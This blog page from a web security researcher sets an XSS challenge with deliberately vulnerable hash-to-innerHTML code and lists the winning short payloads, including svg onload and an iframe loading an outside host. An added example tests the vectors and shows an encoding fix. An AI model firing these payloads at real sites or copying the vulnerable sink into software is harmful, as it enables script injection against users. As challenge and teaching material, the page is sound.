David Sopas – Web Security Researcher

19/08/15, Bug Bounty, Challenge

Results for the XSS challenge

The first challenge was very interesting. It was an easy challenge, but it's a start. New challenges will be up soon.

The winners are (they were the first to submit a working solution):

1º Luciano Corsalini – $50 Amazon gift card

#<svg/onload=alert(`xss`)>

2º Kenan – $25 Amazon gift card

#<svg/onload=alert(/xss/)>

Choosing the bonus prize wasn't easy. I decided to give a $25 Amazon gift card for the most creative XSS vector.

The winner was Abdulrahman Alqabandi:

#<iframe/src=//14.rs>

Also I would like to share another pretty good solution from Ashar Javed:

<p/oncut=alert`xss`>x

Congratulations to the winners and to all participants. Thanks for your time and effort.
Winners will be contacted soon by email.

14/08/15, Challenge

Win $50 Amazon Gift card with a XSS challenge

I'm a big fan of XSS and, to make my new website more visible to the infosec guys, I'm offering two Amazon gift cards.
The first correct solution wins a $50 Amazon gift card. The second one receives a $25 Amazon gift card.

The rules are simple (like the challenge). Show an alert box, with a message containing the word xss, using the following vulnerable code.

<script>
// Reads the URL fragment, strips ' " , and space, then writes the first
// 26 characters into the page as HTML (this is the challenge's sink).
function go()
{
var w = location.hash;
w = w.replace(/['", ]+/g, "");
document.getElementById("say").innerHTML = w.substring(0,26);
}
</script>

<div id="say"></div>

<a onclick="go()">Say it</a>
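Added example (not code from the original post): a Node model of the filter inside go(), next to an output-encoding fix, run over the vectors published in the results post above. Function names and the audit helper are my own assumptions; the inputs include the leading "#" because location.hash carries it, which is why the 26-character cap counts it.

```javascript
// Exactly what the challenge does before writing to innerHTML:
// strip ' " , and space, then keep only the first 26 characters.
function challengeFilter(hash) {
  return hash.replace(/['", ]+/g, "").substring(0, 26);
}

// Defender's fix: treat the fragment as data, never as markup. In a browser,
// assign it with textContent; if an innerHTML sink is unavoidable, encode the
// HTML-significant characters first so no element or attribute can be formed.
function encodeHtml(s) {
  return s.replace(/[&<>"'`=\/]/g, c => "&#" + c.charCodeAt(0) + ";");
}

function hardenedFilter(hash) {
  // Cap the data first, then encode for output (encoding expands the string).
  return encodeHtml(challengeFilter(hash));
}

// Does the string still contain the start of an HTML tag after filtering?
function createsElement(out) {
  return /<[a-z]/i.test(out);
}

// Constructed inputs: the vectors from the results post, as location.hash
// would deliver them (with the "#").
const vectors = [
  "#<svg/onload=alert(`xss`)>",
  "#<svg/onload=alert(/xss/)>",
  "#<iframe/src=//14.rs>",
  "#<p/oncut=alert`xss`>x",
];

// Run every vector through a filter and record whether markup survives.
function audit(filter) {
  return vectors.map(v => ({
    input: v,
    output: filter(v),
    markup: createsElement(filter(v)),
  }));
}

// The blocklist removes four characters but none that markup needs:
// every vector survives challengeFilter, none survives hardenedFilter.
console.table(audit(challengeFilter));
console.table(audit(hardenedFilter));
```

The blocklist only removes the four characters in the regex, so it never decides whether the output is safe; the encoder (or textContent) does.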

Rules:

  • You can't use the characters stripped by the w.replace line of code (single quote, double quote, comma and space)
  • You can only use the latest versions of Chrome, Firefox, Opera, Internet Explorer or Safari
  • The XSS vector must be at most 26 characters long
  • When commenting your entry, use the [ code]code[ /code] tags to write your code (without the leading space)

The challenge will end on 19 August at midnight. All solutions must be added in the comments of this post.
All the comments will be inactive until the challenge finishes.

UPDATE: I’ll give a bonus to the user who replies with the most creative XSS.

Good luck! Happy hunting 🙂
